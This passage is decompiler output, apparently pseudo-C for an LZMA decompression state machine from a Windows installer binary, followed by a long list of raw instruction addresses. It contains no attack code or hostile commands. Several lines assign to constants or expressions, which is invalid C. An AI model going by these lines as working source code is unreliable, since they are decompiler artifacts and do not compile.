                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												L55:
                                  												__al =  *(__ebp - 0x44);
                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  												goto L56;
                                  											}
                                  											L61:
                                  											__eax =  *(__ebp - 0x58);
                                  											__edx = __ebx + __ebx;
                                  											__ecx =  *(__ebp - 0x10);
                                  											__esi = __edx + __eax;
                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												_t217 = __edx + 1; // 0x1
                                  												__ebx = _t217;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L60;
                                  											} else {
                                  												goto L58;
                                  											}
                                  										case 0x10:
                                  											L110:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x10;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t366 = __ebp - 0x70;
                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t366;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											goto L112;
                                  										case 0x11:
                                  											L69:
                                  											__esi =  *(__ebp - 0x58);
                                  											 *(__ebp - 0x84) = 0x12;
                                  											L132:
                                  											 *(_t612 - 0x54) = _t605;
                                  											goto L133;
                                  										case 0x12:
                                  											goto L0;
                                  										case 0x13:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												_t469 = __ebp - 0x58;
                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  												__eflags =  *_t469;
                                  												 *(__ebp - 0x30) = 0x10;
                                  												 *(__ebp - 0x40) = 8;
                                  												goto L144;
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											 *(__ebp - 0x30) = 8;
                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  											goto L130;
                                  										case 0x14:
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  											__eax =  *(__ebp - 0x80);
                                  											L140:
                                  											 *(_t612 - 0x88) = _t533;
                                  											goto L1;
                                  										case 0x15:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  											__al = __al & 0x000000fd;
                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  											goto L121;
                                  										case 0x16:
                                  											__eax =  *(__ebp - 0x30);
                                  											__eflags = __eax - 4;
                                  											if(__eax >= 4) {
                                  												_push(3);
                                  												_pop(__eax);
                                  											}
                                  											__ecx =  *(__ebp - 4);
                                  											 *(__ebp - 0x40) = 6;
                                  											__eax = __eax << 7;
                                  											 *(__ebp - 0x7c) = 0x19;
                                  											 *(__ebp - 0x58) = __eax;
                                  											goto L145;
                                  										case 0x17:
                                  											goto L145;
                                  										case 0x18:
                                  											L146:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x18;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t484 = __ebp - 0x70;
                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t484;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L148:
                                  											_t487 = __ebp - 0x48;
                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                  											__eflags =  *_t487;
                                  											goto L149;
                                  										case 0x19:
                                  											__eflags = __ebx - 4;
                                  											if(__ebx < 4) {
                                  												 *(__ebp - 0x2c) = __ebx;
                                  												L120:
                                  												_t394 = __ebp - 0x2c;
                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                  												__eflags =  *_t394;
                                  												L121:
                                  												__eax =  *(__ebp - 0x2c);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  													goto L170;
                                  												}
                                  												__eflags = __eax -  *(__ebp - 0x60);
                                  												if(__eax >  *(__ebp - 0x60)) {
                                  													goto L171;
                                  												}
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  												__eax =  *(__ebp - 0x30);
                                  												_t401 = __ebp - 0x60;
                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  												__eflags =  *_t401;
                                  												goto L124;
                                  											}
                                  											__ecx = __ebx;
                                  											__eax = __ebx;
                                  											__ecx = __ebx >> 1;
                                  											__eax = __ebx & 0x00000001;
                                  											__ecx = (__ebx >> 1) - 1;
                                  											__al = __al | 0x00000002;
                                  											__eax = (__ebx & 0x00000001) << __cl;
                                  											__eflags = __ebx - 0xe;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ebx >= 0xe) {
                                  												__ebx = 0;
                                  												 *(__ebp - 0x48) = __ecx;
                                  												L103:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__eax = __eax + __ebx;
                                  													 *(__ebp - 0x40) = 4;
                                  													 *(__ebp - 0x2c) = __eax;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x644;
                                  													__eflags = __eax;
                                  													L109:
                                  													__ebx = 0;
                                  													 *(__ebp - 0x58) = __eax;
                                  													 *(__ebp - 0x50) = 1;
                                  													 *(__ebp - 0x44) = 0;
                                  													 *(__ebp - 0x48) = 0;
                                  													L113:
                                  													__eax =  *(__ebp - 0x40);
                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  														_t392 = __ebp - 0x2c;
                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                  														__eflags =  *_t392;
                                  														goto L120;
                                  													}
                                  													__eax =  *(__ebp - 0x50);
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  													__eax =  *(__ebp - 0x58);
                                  													__esi = __edi + __eax;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__ax =  *__esi;
                                  													__ecx = __ax & 0x0000ffff;
                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                  													if( *(__ebp - 0xc) >= __edx) {
                                  														__ecx = 0;
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  														__ecx = 1;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  														__ebx = 1;
                                  														__ecx =  *(__ebp - 0x48);
                                  														__ebx = 1 << __cl;
                                  														__ecx = 1 << __cl;
                                  														__ebx =  *(__ebp - 0x44);
                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                  														__cx = __ax;
                                  														__cx = __ax >> 5;
                                  														__eax = __eax - __ecx;
                                  														__edi = __edi + 1;
                                  														__eflags = __edi;
                                  														 *(__ebp - 0x44) = __ebx;
                                  														 *__esi = __ax;
                                  														 *(__ebp - 0x50) = __edi;
                                  													} else {
                                  														 *(__ebp - 0x10) = __edx;
                                  														0x800 = 0x800 - __ecx;
                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  														 *__esi = __dx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L112:
                                  														_t369 = __ebp - 0x48;
                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                  														__eflags =  *_t369;
                                  														goto L113;
                                  													} else {
                                  														goto L110;
                                  													}
                                  												}
                                  												__ecx =  *(__ebp - 0xc);
                                  												__ebx = __ebx + __ebx;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  													__ecx =  *(__ebp - 0x10);
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													__ebx = __ebx | 0x00000001;
                                  													__eflags = __ebx;
                                  													 *(__ebp - 0x44) = __ebx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													L102:
                                  													_t339 = __ebp - 0x48;
                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                  													__eflags =  *_t339;
                                  													goto L103;
                                  												} else {
                                  													goto L100;
                                  												}
                                  											}
                                  											__edx =  *(__ebp - 4);
                                  											__eax = __eax - __ebx;
                                  											 *(__ebp - 0x40) = __ecx;
                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  											goto L109;
                                  										case 0x1a:
                                  											L56:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1a;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x68);
                                  											__al =  *(__ebp - 0x5c);
                                  											__edx =  *(__ebp - 8);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  											 *( *(__ebp - 0x68)) = __al;
                                  											__ecx =  *(__ebp - 0x14);
                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                  											__eax = __ecx + 1;
                                  											__edx = 0;
                                  											_t192 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t192;
                                  											goto L80;
                                  										case 0x1b:
                                  											L76:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1b;
                                  												goto L170;
                                  											}
                                  											__eax =  *(__ebp - 0x14);
                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  											__eflags = __eax -  *(__ebp - 0x74);
                                  											if(__eax >=  *(__ebp - 0x74)) {
                                  												__eax = __eax +  *(__ebp - 0x74);
                                  												__eflags = __eax;
                                  											}
                                  											__edx =  *(__ebp - 8);
                                  											__cl =  *(__eax + __edx);
                                  											__eax =  *(__ebp - 0x14);
                                  											 *(__ebp - 0x5c) = __cl;
                                  											 *(__eax + __edx) = __cl;
                                  											__eax = __eax + 1;
                                  											__edx = 0;
                                  											_t275 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t275;
                                  											__eax =  *(__ebp - 0x68);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											_t284 = __ebp - 0x64;
                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                  											__eflags =  *_t284;
                                  											 *( *(__ebp - 0x68)) = __cl;
                                  											L80:
                                  											 *(__ebp - 0x14) = __edx;
                                  											goto L81;
                                  										case 0x1c:
                                  											while(1) {
                                  												L124:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t415 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t415;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  												__eflags =  *(__ebp - 0x30);
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												 *(__ebp - 0x14) = _t415;
                                  												if( *(__ebp - 0x30) > 0) {
                                  													continue;
                                  												} else {
                                  													L81:
                                  													 *(__ebp - 0x88) = 2;
                                  													goto L1;
                                  												}
                                  											}
                                  											 *(__ebp - 0x88) = 0x1c;
                                  											L170:
                                  											_push(0x22);
                                  											_pop(_t567);
                                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                  											_t535 = 0;
                                  											L172:
                                  											return _t535;
                                  									}
                                  								}
                                  								L171:
                                  								_t535 = _t534 | 0xffffffff;
                                  								goto L172;
                                  							}
                                  						}
                                  						__eax =  *(__ebp - 0x50);
                                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  						__eax =  *(__ebp - 0x58);
                                  						__esi = __edx + __eax;
                                  						 *(__ebp - 0x54) = __esi;
                                  						__ax =  *__esi;
                                  						__edi = __ax & 0x0000ffff;
                                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  						if( *(__ebp - 0xc) >= __ecx) {
                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  							__cx = __ax;
                                  							__cx = __ax >> 5;
                                  							__eax = __eax - __ecx;
                                  							__edx = __edx + 1;
                                  							 *__esi = __ax;
                                  							 *(__ebp - 0x50) = __edx;
                                  						} else {
                                  							 *(__ebp - 0x10) = __ecx;
                                  							0x800 = 0x800 - __edi;
                                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  							 *__esi = __cx;
                                  						}
                                  						if( *(__ebp - 0x10) >= 0x1000000) {
                                  							goto L148;
                                  						} else {
                                  							goto L146;
                                  						}
                                  					}
                                  					goto L1;
                                  				}
                                  			}








                                  0x00000000
                                  0x00406682
                                  0x00406682
                                  0x00406686
                                  0x004066ab
                                  0x004066b5
                                  0x00000000
                                  0x00406688
                                  0x00406688
                                  0x0040668b
                                  0x0040668f
                                  0x00406692
                                  0x00406695
                                  0x00406699
                                  0x00406699
                                  0x0040669c
                                  0x00406776
                                  0x00406776
                                  0x0040677d
                                  0x0040677d
                                  0x00406780
                                  0x00406787
                                  0x004067b4
                                  0x004067b8
                                  0x00406818
                                  0x0040681b
                                  0x00406820
                                  0x00406821
                                  0x00406823
                                  0x00406825
                                  0x00406828
                                  0x00406734
                                  0x00406734
                                  0x00406734
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed0
                                  0x00405ed9
                                  0x00000000
                                  0x00000000
                                  0x00405edf
                                  0x00000000
                                  0x00405eea
                                  0x00000000
                                  0x00000000
                                  0x00405ef3
                                  0x00405ef6
                                  0x00405ef9
                                  0x00405efd
                                  0x00000000
                                  0x00000000
                                  0x00405f03
                                  0x00405f06
                                  0x00405f08
                                  0x00405f09
                                  0x00405f0c
                                  0x00405f0e
                                  0x00405f0f
                                  0x00405f11
                                  0x00405f14
                                  0x00405f19
                                  0x00405f1e
                                  0x00405f27
                                  0x00405f3a
                                  0x00405f3d
                                  0x00405f49
                                  0x00405f71
                                  0x00405f73
                                  0x00405f81
                                  0x00405f81
                                  0x00405f85
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405f75
                                  0x00405f75
                                  0x00405f78
                                  0x00405f79
                                  0x00405f79
                                  0x00000000
                                  0x00405f75
                                  0x00405f4f
                                  0x00405f54
                                  0x00405f54
                                  0x00405f5d
                                  0x00405f65
                                  0x00405f68
                                  0x00000000
                                  0x00405f6e
                                  0x00405f6e
                                  0x00000000
                                  0x00405f6e
                                  0x00000000
                                  0x00405f8b
                                  0x00405f8b
                                  0x00405f8f
                                  0x0040683b
                                  0x00000000
                                  0x0040683b
                                  0x00405f98
                                  0x00405fa8
                                  0x00405fab
                                  0x00405fae
                                  0x00405fae
                                  0x00405fae
                                  0x00405fb1
                                  0x00405fb5
                                  0x00000000
                                  0x00000000
                                  0x00405fb7
                                  0x00405fbd
                                  0x00405fe7
                                  0x00405fed
                                  0x00405ff4
                                  0x00000000
                                  0x00405ff4
                                  0x00405fc3
                                  0x00405fc6
                                  0x00405fcb
                                  0x00405fcb
                                  0x00405fd6
                                  0x00405fde
                                  0x00405fe1
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406026
                                  0x0040602c
                                  0x0040602f
                                  0x0040603c
                                  0x00406044
                                  0x00000000
                                  0x00000000
                                  0x00405ffb
                                  0x00405ffb
                                  0x00405fff
                                  0x0040684a
                                  0x00000000
                                  0x0040684a
                                  0x0040600b
                                  0x00406016
                                  0x00406016
                                  0x00406016
                                  0x00406019
                                  0x0040601c
                                  0x0040601f
                                  0x00406024
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004066bb
                                  0x004066bb
                                  0x004066c1
                                  0x004066c7
                                  0x004066cd
                                  0x004066e7
                                  0x004066ea
                                  0x004066f0
                                  0x004066fb
                                  0x004066fb
                                  0x004066fd
                                  0x004066cf
                                  0x004066cf
                                  0x004066de
                                  0x004066e2
                                  0x004066e2
                                  0x00406707
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406709
                                  0x0040670d
                                  0x004068bc
                                  0x00000000
                                  0x004068bc
                                  0x00406719
                                  0x00406720
                                  0x00406728
                                  0x0040672b
                                  0x0040672e
                                  0x0040672e
                                  0x00000000
                                  0x00000000
                                  0x0040604c
                                  0x0040604e
                                  0x00406051
                                  0x004060c2
                                  0x004060c5
                                  0x004060c8
                                  0x004060cf
                                  0x004060d9
                                  0x00000000
                                  0x004060d9
                                  0x00406053
                                  0x00406057
                                  0x0040605a
                                  0x0040605c
                                  0x0040605f
                                  0x00406062
                                  0x00406064
                                  0x00406067
                                  0x00406069
                                  0x0040606e
                                  0x00406071
                                  0x00406074
                                  0x00406078
                                  0x0040607f
                                  0x00406082
                                  0x00406089
                                  0x0040608d
                                  0x00406095
                                  0x00406095
                                  0x00406095
                                  0x0040608f
                                  0x0040608f
                                  0x0040608f
                                  0x00406084
                                  0x00406084
                                  0x00406084
                                  0x00406099
                                  0x0040609c
                                  0x004060ba
                                  0x004060bc
                                  0x00000000
                                  0x0040609e
                                  0x0040609e
                                  0x004060a1
                                  0x004060a4
                                  0x004060a7
                                  0x004060a9
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x004060af
                                  0x004060b1
                                  0x004060b2
                                  0x004060b5
                                  0x00000000
                                  0x004060b5
                                  0x00000000
                                  0x004062eb
                                  0x004062ef
                                  0x0040630d
                                  0x00406310
                                  0x00406317
                                  0x0040631a
                                  0x0040631d
                                  0x00406320
                                  0x00406323
                                  0x00406326
                                  0x00406328
                                  0x0040632f
                                  0x00406330
                                  0x00406332
                                  0x00406335
                                  0x00406338
                                  0x0040633b
                                  0x0040633b
                                  0x00406340
                                  0x00000000
                                  0x00406340
                                  0x004062f1
                                  0x004062f4
                                  0x004062f7
                                  0x00406301
                                  0x00000000
                                  0x00000000
                                  0x00406355
                                  0x00406359
                                  0x0040637c
                                  0x0040637f
                                  0x00406382
                                  0x0040638c
                                  0x0040635b
                                  0x0040635b
                                  0x0040635e
                                  0x00406361
                                  0x00406364
                                  0x00406371
                                  0x00406374
                                  0x00406374
                                  0x00000000
                                  0x00000000
                                  0x00406398
                                  0x0040639c
                                  0x00000000
                                  0x00000000
                                  0x004063a2
                                  0x004063a6
                                  0x00000000
                                  0x00000000
                                  0x004063ac
                                  0x004063ae
                                  0x004063b2
                                  0x004063b2
                                  0x004063b5
                                  0x004063b9
                                  0x00000000
                                  0x00000000
                                  0x00406409
                                  0x0040640d
                                  0x00406414
                                  0x00406417
                                  0x0040641a
                                  0x00406424
                                  0x00000000
                                  0x00406424
                                  0x0040640f
                                  0x00000000
                                  0x00000000
                                  0x00406430
                                  0x00406434
                                  0x0040643b
                                  0x0040643e
                                  0x00406441
                                  0x00406436
                                  0x00406436
                                  0x00406436
                                  0x00406444
                                  0x00406447
                                  0x0040644a
                                  0x0040644a
                                  0x0040644d
                                  0x00406450
                                  0x00406453
                                  0x00406453
                                  0x00406456
                                  0x0040645d
                                  0x00406462
                                  0x00000000
                                  0x00000000
                                  0x004064f0
                                  0x004064f0
                                  0x004064f4
                                  0x00406892
                                  0x00000000
                                  0x00406892
                                  0x004064fa
                                  0x004064fd
                                  0x00406500
                                  0x00406504
                                  0x00406507
                                  0x0040650d
                                  0x0040650f
                                  0x0040650f
                                  0x0040650f
                                  0x00406512
                                  0x00406515
                                  0x00000000
                                  0x00000000
                                  0x004060e5
                                  0x004060e5
                                  0x004060e9
                                  0x00406856
                                  0x00000000
                                  0x00406856
                                  0x004060ef
                                  0x004060f2
                                  0x004060f5
                                  0x004060f9
                                  0x004060fc
                                  0x00406102
                                  0x00406104
                                  0x00406104
                                  0x00406104
                                  0x00406107
                                  0x0040610a
                                  0x0040610a
                                  0x0040610d
                                  0x00406110
                                  0x00000000
                                  0x00000000
                                  0x00406116
                                  0x0040611c
                                  0x00000000
                                  0x00000000
                                  0x00406122
                                  0x00406122
                                  0x00406126
                                  0x00406129
                                  0x0040612c
                                  0x0040612f
                                  0x00406132
                                  0x00406133
                                  0x00406136
                                  0x00406138
                                  0x0040613e
                                  0x00406141
                                  0x00406144
                                  0x00406147
                                  0x0040614a
                                  0x0040614d
                                  0x00406150
                                  0x0040616c
                                  0x0040616f
                                  0x00406172
                                  0x00406175
                                  0x0040617c
                                  0x00406180
                                  0x00406182
                                  0x00406186
                                  0x00406152
                                  0x00406152
                                  0x00406156
                                  0x0040615e
                                  0x00406163
                                  0x00406165
                                  0x00406167
                                  0x00406167
                                  0x00406189
                                  0x00406190
                                  0x00406193
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x00406199
                                  0x00000000
                                  0x0040619e
                                  0x0040619e
                                  0x004061a2
                                  0x00406862
                                  0x00000000
                                  0x00406862
                                  0x004061a8
                                  0x004061ab
                                  0x004061ae
                                  0x004061b2
                                  0x004061b5
                                  0x004061bb
                                  0x004061bd
                                  0x004061bd
                                  0x004061bd
                                  0x004061c0
                                  0x004061c3
                                  0x004061c3
                                  0x004061c3
                                  0x004061c9
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004061ce
                                  0x004061d1
                                  0x004061d4
                                  0x004061d7
                                  0x004061da
                                  0x004061dd
                                  0x004061e0
                                  0x004061e3
                                  0x004061e6
                                  0x004061e9
                                  0x00406201
                                  0x00406204
                                  0x00406207
                                  0x0040620a
                                  0x0040620a
                                  0x0040620d
                                  0x00406211
                                  0x00406213
                                  0x004061eb
                                  0x004061eb
                                  0x004061f3
                                  0x004061f8
                                  0x004061fa
                                  0x004061fc
                                  0x004061fc
                                  0x00406216
                                  0x0040621d
                                  0x00406220
                                  0x00000000
                                  0x00406222
                                  0x00000000
                                  0x00406222
                                  0x00406220
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00406227
                                  0x00000000
                                  0x00000000
                                  0x00406262
                                  0x00406262
                                  0x00406266
                                  0x0040686e
                                  0x00000000
                                  0x0040686e
                                  0x0040626c
                                  0x0040626f
                                  0x00406272
                                  0x00406276
                                  0x00406279
                                  0x0040627f
                                  0x00406281
                                  0x00406281
                                  0x00406281
                                  0x00406284
                                  0x00406287
                                  0x00406287
                                  0x0040628d
                                  0x0040622b
                                  0x0040622b
                                  0x0040622e
                                  0x00000000
                                  0x0040622e
                                  0x0040628f
                                  0x0040628f
                                  0x00406292
                                  0x00406295
                                  0x00406298
                                  0x0040629b
                                  0x0040629e
                                  0x004062a1
                                  0x004062a4
                                  0x004062a7
                                  0x004062aa
                                  0x004062ad
                                  0x004062c5
                                  0x004062c8
                                  0x004062cb
                                  0x004062ce
                                  0x004062ce
                                  0x004062d1
                                  0x004062d5
                                  0x004062d7
                                  0x004062af
                                  0x004062af
                                  0x004062b7
                                  0x004062bc
                                  0x004062be
                                  0x004062c0
                                  0x004062c0
                                  0x004062da
                                  0x004062e1
                                  0x004062e4
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x004062e6
                                  0x00000000
                                  0x00406573
                                  0x00406573
                                  0x00406577
                                  0x0040689e
                                  0x00000000
                                  0x0040689e
                                  0x0040657d
                                  0x00406580
                                  0x00406583
                                  0x00406587
                                  0x0040658a
                                  0x00406590
                                  0x00406592
                                  0x00406592
                                  0x00406592
                                  0x00406595
                                  0x00000000
                                  0x00000000
                                  0x00406343
                                  0x00406343
                                  0x00406346
                                  0x004066b8
                                  0x004066b8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040673f
                                  0x00406743
                                  0x00406761
                                  0x00406761
                                  0x00406761
                                  0x00406768
                                  0x0040676f
                                  0x00000000
                                  0x0040676f
                                  0x00406745
                                  0x00406748
                                  0x0040674b
                                  0x0040674e
                                  0x00406755
                                  0x00000000
                                  0x00000000
                                  0x00406830
                                  0x00406833
                                  0x00406734
                                  0x00406734
                                  0x00000000
                                  0x00000000
                                  0x0040646a
                                  0x0040646c
                                  0x00406473
                                  0x00406474
                                  0x00406476
                                  0x00406479
                                  0x00000000
                                  0x00000000
                                  0x00406481
                                  0x00406484
                                  0x00406487
                                  0x00406489
                                  0x0040648b
                                  0x0040648b
                                  0x0040648c
                                  0x0040648f
                                  0x00406496
                                  0x00406499
                                  0x004064a7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040678c
                                  0x0040678c
                                  0x00406790
                                  0x004068c8
                                  0x00000000
                                  0x004068c8
                                  0x00406796
                                  0x00406799
                                  0x0040679c
                                  0x004067a0
                                  0x004067a3
                                  0x004067a9
                                  0x004067ab
                                  0x004067ab
                                  0x004067ab
                                  0x004067ae
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x004067b1
                                  0x00000000
                                  0x00000000
                                  0x004064af
                                  0x004064b2
                                  0x004064e8
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x00406618
                                  0x0040661b
                                  0x0040661b
                                  0x0040661e
                                  0x00406620
                                  0x004068aa
                                  0x00000000
                                  0x004068aa
                                  0x00406626
                                  0x00406629
                                  0x00000000
                                  0x00000000
                                  0x0040662f
                                  0x00406633
                                  0x00406636
                                  0x00406636
                                  0x00406636
                                  0x00000000
                                  0x00406636
                                  0x004064b4
                                  0x004064b6
                                  0x004064b8
                                  0x004064ba
                                  0x004064bd
                                  0x004064be
                                  0x004064c0
                                  0x004064c2
                                  0x004064c5
                                  0x004064c8
                                  0x004064de
                                  0x004064e3
                                  0x0040651b
                                  0x0040651b
                                  0x0040651f
                                  0x0040654b
                                  0x0040654d
                                  0x00406554
                                  0x00406557
                                  0x0040655a
                                  0x0040655a
                                  0x0040655f
                                  0x0040655f
                                  0x00406561
                                  0x00406564
                                  0x0040656b
                                  0x0040656e
                                  0x0040659b
                                  0x0040659b
                                  0x0040659e
                                  0x004065a1
                                  0x00406615
